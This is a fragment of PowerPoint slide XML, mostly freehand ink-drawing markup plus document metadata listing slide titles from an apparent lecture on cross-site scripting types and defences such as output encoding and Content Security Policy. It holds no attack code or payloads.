          <a:xfrm>
            <a:off x="812335" y="995367"/>
            <a:ext cx="1361520" cy="318240"/>
            <a:chOff x="3729526" y="1005434"/>
            <a:chExt cx="1361520" cy="318240"/>
          </a:xfrm>
        </p:grpSpPr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2E1E8174-2710-4D91-A4D8-9AFF47E38E2A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3729526" y="1005434"/>
              <a:ext cx="1055520" cy="318240"/>
              <a:chOff x="3729526" y="1005434"/>
              <a:chExt cx="105552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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="3729526" y="1005434"/>
                  <a:ext cx="229320" cy="318240"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="68" name="Freihand 67">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D35710D4-9B8F-4B50-B227-E3FC4DF12DC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720526" y="996434"/>
                    <a:ext cx="2469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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="3775966" y="1163834"/>
                  <a:ext cx="100440" cy="1584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BEBB58D0-D513-4EF0-943C-1123591042F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767326" y="1154834"/>
                    <a:ext cx="118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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="4019326" y="1006874"/>
                  <a:ext cx="21600" cy="29916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35009FE-E19D-42B4-BF63-CB2D10C1506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010686" y="997874"/>
                    <a:ext cx="3924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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="3973966" y="1096154"/>
                  <a:ext cx="119160" cy="12960"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="72" name="Freihand 71">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DEBFB14-C763-46B8-A861-2C1EF766121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964966" y="1087514"/>
                    <a:ext cx="13680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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="4179526" y="1013354"/>
                  <a:ext cx="37440" cy="29700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AF20DF54-4FE1-4C41-ACC7-A260ECCDF117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170526" y="1004354"/>
                    <a:ext cx="5508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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="4094206" y="1089674"/>
                  <a:ext cx="177480" cy="33120"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="74" name="Freihand 73">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E0B4152-4ADE-4358-AA15-5DDDD42425E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085206" y="1080674"/>
                    <a:ext cx="195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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="4294726" y="1167794"/>
                  <a:ext cx="118080" cy="11808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25579A89-C958-421C-818C-C1193B286E3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286086" y="1158794"/>
                    <a:ext cx="1357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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="4423966" y="1165634"/>
                  <a:ext cx="57240" cy="108360"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="77" name="Freihand 76">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE56F536-7896-4828-9D52-A99147AF8B4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414966" y="1156994"/>
                    <a:ext cx="748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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="4535926" y="1176794"/>
                  <a:ext cx="124920" cy="10908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59682C3E-0521-4F0A-922F-FD8D53C6C52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526926" y="1168154"/>
                    <a:ext cx="1425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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="4672006" y="1061234"/>
                  <a:ext cx="24120" cy="229320"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="79" name="Freihand 78">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A9913FB-AE13-4673-B4BF-CA1D4EF0B83C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663366" y="1052594"/>
                    <a:ext cx="4176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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="4706926" y="1144034"/>
                  <a:ext cx="78120" cy="140040"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="82" name="Freihand 81">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5290717-DE50-440A-B1CA-A004810B20A4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697926" y="1135394"/>
                    <a:ext cx="957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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4830766" y="1146554"/>
                <a:ext cx="120960" cy="11592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6FC74C8F-716E-4DCC-A3D1-5158B5AA3DF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2126" y="1137554"/>
                  <a:ext cx="13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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4994566" y="1115954"/>
                <a:ext cx="96480" cy="16308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D6C8784D-F4A5-4191-8674-52DB509DF2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85926" y="1106954"/>
                  <a:ext cx="11412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92D00B66-3C9C-4F21-9A79-2112801EDF94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="688966" y="840914"/>
            <a:ext cx="1555200" cy="87840"/>
            <a:chOff x="688966" y="840914"/>
            <a:chExt cx="15552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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="688966" y="914354"/>
                <a:ext cx="91440" cy="144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1B67F204-BF94-41AE-9EB7-A624346B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9966" y="905354"/>
                  <a:ext cx="109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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="889846" y="886274"/>
                <a:ext cx="97200" cy="1368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87E0CF5-BB4A-4E53-A89C-1D4A8CF0C2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1206" y="877634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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1107286" y="886994"/>
                <a:ext cx="109080" cy="1296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68F14080-7143-47AB-85D2-9F746A8DED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8286" y="878354"/>
                  <a:ext cx="12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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1324366" y="876914"/>
                <a:ext cx="93600" cy="10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5C10C10F-B3CF-4FD2-AE78-12C8454B8DF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15726" y="867914"/>
                  <a:ext cx="11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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1533886" y="882314"/>
                <a:ext cx="93600" cy="90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6768984B-3AB3-4243-A7E4-121E6CD7F8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24886" y="873674"/>
                  <a:ext cx="11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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1716046" y="878714"/>
                <a:ext cx="116640" cy="576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BD2A631C-F6C7-4A8D-891E-90897A542A2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07406" y="870074"/>
                  <a:ext cx="134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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1964446" y="857114"/>
                <a:ext cx="87840" cy="864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EE5912C2-369F-469B-B7FC-717ED622CE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5806" y="848474"/>
                  <a:ext cx="105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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2154526" y="840914"/>
                <a:ext cx="89640" cy="1548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97520F73-BF94-4396-9F5E-41DA1A3372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5886" y="831914"/>
                  <a:ext cx="1072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47881ECC-E0BB-40EF-AF61-47749460AC39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="2442541">
            <a:off x="766144" y="2398565"/>
            <a:ext cx="1090080" cy="390600"/>
            <a:chOff x="3426766" y="948194"/>
            <a:chExt cx="1090080" cy="39060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2CC50BE5-2E5E-43CC-BF86-EC0FBA4661D4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3426766" y="948194"/>
              <a:ext cx="904320" cy="390600"/>
              <a:chOff x="3426766" y="948194"/>
              <a:chExt cx="90432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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="3426766" y="1083194"/>
                  <a:ext cx="48240" cy="255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EBB9AFB0-6A5C-4551-BDEF-1095A01DB3E0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418126" y="1074194"/>
                    <a:ext cx="6588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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="3477526" y="1056554"/>
                  <a:ext cx="121680" cy="12744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CCE544B3-B01D-43E0-A721-0A1DD81A94EB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468526" y="1047554"/>
                    <a:ext cx="139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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="3628006" y="967274"/>
                  <a:ext cx="136800" cy="20412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AFB71AF6-1B8B-4478-AAD1-78330FAEAAC8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619006" y="958274"/>
                    <a:ext cx="154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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="3829246" y="1067714"/>
                  <a:ext cx="20880" cy="9000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0A561DAB-96D8-42A9-AEB2-35368FD338B4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820606" y="1059074"/>
                    <a:ext cx="385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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="3814126" y="987074"/>
                  <a:ext cx="16560" cy="2016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923FAD48-1D76-45D1-BA10-9019525F63B5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3805486" y="978074"/>
                    <a:ext cx="342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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="3846526" y="1030634"/>
                  <a:ext cx="139320" cy="15768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D57C7ACC-ABDB-44EE-A85B-F687A4804EE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3837886" y="1021634"/>
                    <a:ext cx="156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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="3985486" y="948194"/>
                  <a:ext cx="109080" cy="2379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674B83CC-080B-45CF-9EF4-300F45CB03B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3976846" y="939194"/>
                    <a:ext cx="1267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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="4144246" y="1065554"/>
                  <a:ext cx="28080" cy="11664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A7E89581-F34B-4F1B-A91C-15E553AB4E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4135246" y="1056914"/>
                    <a:ext cx="45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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="4119406" y="971594"/>
                  <a:ext cx="21600" cy="1800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7DBCF467-3E7F-472A-99C1-5433E09F6395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4110406" y="962954"/>
                    <a:ext cx="39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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="4198606" y="1045754"/>
                  <a:ext cx="132480" cy="14040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C43FAD91-8CDB-4844-AEE5-9861493ADABB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4189966" y="1037114"/>
                    <a:ext cx="15012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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4382566" y="1084634"/>
                <a:ext cx="134280" cy="9468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B39414FD-604D-4203-89E3-1450DFACE85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73566" y="1075994"/>
                  <a:ext cx="15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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4396606" y="1128914"/>
                <a:ext cx="109080" cy="18144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DB72B33-A51D-4538-8C2F-D21EFD4F807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87966" y="1120274"/>
                  <a:ext cx="12672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6A2667DA-1D0B-4736-91E9-C9DC245888FF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BBCA3EFC-F2B5-42B0-9949-D43006EE228A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B81C4DA9-136E-46C3-A3F0-B8C6C8DAC68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55A3802D-697F-4F8B-A476-E55C74D1CD37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58A1CD34-CC25-4F15-87DB-7FACEA8C5B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583C8456-5B00-4034-A6C8-3FBA2143F175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34BBCCB0-CBCC-405C-BC8C-8A2C9B902D9E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BBD9F313-DF82-4312-9B46-B2F844935EB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D4304B06-450B-46A9-9AE3-FDC548E6B226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7802B83-3074-4DF2-81F1-E9E16F1E45B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571C1EF-94F3-4183-ABE1-E22628A2CE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086AD85D-A484-45F4-AB7C-032EC876B82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B6473CC8-DA6A-40B5-963E-1CC1F2E957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0804778E-0B2E-400D-8AE3-45B4685E2BD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8EFD220-4219-466A-839C-7F271210422F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1D2F212D-031B-4156-AEEE-46E159A2626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003A127A-3C1F-4CCF-A522-4F0CD6AD13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B051F1B6-8119-4B16-AACF-553D67C24C6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BA88B18C-04FD-4C9D-896F-1727EB892E4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858AB5DD-D9A8-47E0-B345-76CDA57C5F4C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7ED851-5B73-4766-882E-C8C37C6BC7B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51A612FD-57EE-4D98-913E-1B6C23FB26B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7916D1A2-F1C5-45D8-95B0-DE23951564B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21D75CC5-1E48-48F8-B234-9018A38E1BDF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9480245B-8A91-4863-BB1B-3CB7337B823B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0E4504C9-A1D0-4EB3-9ED6-DD5168D4043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B4DA493-72A3-410E-9AC1-49594BB1C12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AABE017-CEF5-4512-A009-23B4482A02BD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69D103B-06A7-4EE0-A767-2624CC701B5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1078580-5FF5-414E-B639-1A7F42CC8FF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37BE4153-B593-4825-A1BA-F435F895606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5269D2B6-5480-4E38-A7B5-EC24A9642B4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A1F6BD4D-91DB-4ADA-AF53-95B9C4C73A5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8A1EA4CD-D130-4C70-B1F4-4394F1D2F86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D2BDCB6A-9BA9-4CF5-9423-AB0ACE1D1F1E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28774F24-3F73-4150-9B7A-C39560B31D70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E1FA404D-2C3B-46A4-8821-E9D5ACD6806F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0AB5A588-4827-4226-B7F3-FF87F2CD9A1B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B060D84E-942D-4EA3-9596-E5037D79E6A3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B4063F82-0065-48E4-AF00-0EE47FF490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0D0DC01E-4FED-48D4-AB08-344DC5B08926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E7D38EF3-1DAC-4DD6-A409-A9B9CDB4B49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DDBD0400-3885-4E69-AD13-2C7DAEF8D8D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D9116B87-0066-4D46-A1BC-E2F0E8E8F981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4E41B52F-580D-4C8C-B7A3-3665A2B63619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7CF079E4-1E21-498E-8EFD-F2F62723981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72D2533E-B2DA-4631-AD15-77A50FDE64A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4FAF5DD-D5D8-4380-BA87-4C0D936E0B89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648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6CF0350-8ADD-4B77-8937-7CFC4FA7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07" y="1227740"/>
            <a:ext cx="7592786" cy="18728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7921D4-31E1-497F-B4E2-C6420CBD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32" y="3757449"/>
            <a:ext cx="5677336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4240</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Breitbild</PresentationFormat>
  <Paragraphs>853</Paragraphs>
  <Slides>78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3" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Office</vt:lpstr>
      <vt:lpstr>(Remaining) Client-side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 is that even necessary?</vt:lpstr>
      <vt:lpstr>Same Origin Policy to the rescue!</vt:lpstr>
      <vt:lpstr>Remember SOP from previous chapter?</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>Stored XSS</vt:lpstr>
      <vt:lpstr>Stored XSS</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>DOM-based XSS</vt:lpstr>
      <vt:lpstr>Combination Stored + Client XSS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mXSS (mutation-based)</vt:lpstr>
      <vt:lpstr>mXSS (mutation-based) - 2019</vt:lpstr>
      <vt:lpstr>uXSS (universal XSS)</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>Input Validation</vt:lpstr>
      <vt:lpstr>Output Encoding</vt:lpstr>
      <vt:lpstr>Output Encoding</vt:lpstr>
      <vt:lpstr>Output Encoding</vt:lpstr>
      <vt:lpstr>Output Encoding</vt:lpstr>
      <vt:lpstr>Output Encoding</vt:lpstr>
      <vt:lpstr>Use libraries, frameworks and templates (correctly)</vt:lpstr>
      <vt:lpstr>Use libraries, frameworks and templates (correctly)</vt:lpstr>
      <vt:lpstr>Use libraries, frameworks and templates (correctly)</vt:lpstr>
      <vt:lpstr>Use libraries, frameworks and templates (correctly)</vt:lpstr>
      <vt:lpstr>Content Security Policy (CSP)</vt:lpstr>
      <vt:lpstr>Content Security Policy (CSP)</vt:lpstr>
      <vt:lpstr>HTTP Only Flag</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>Nice real life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2021-02-25T09:44:33Z</dcterms:modified>
</cp:coreProperties>
</file>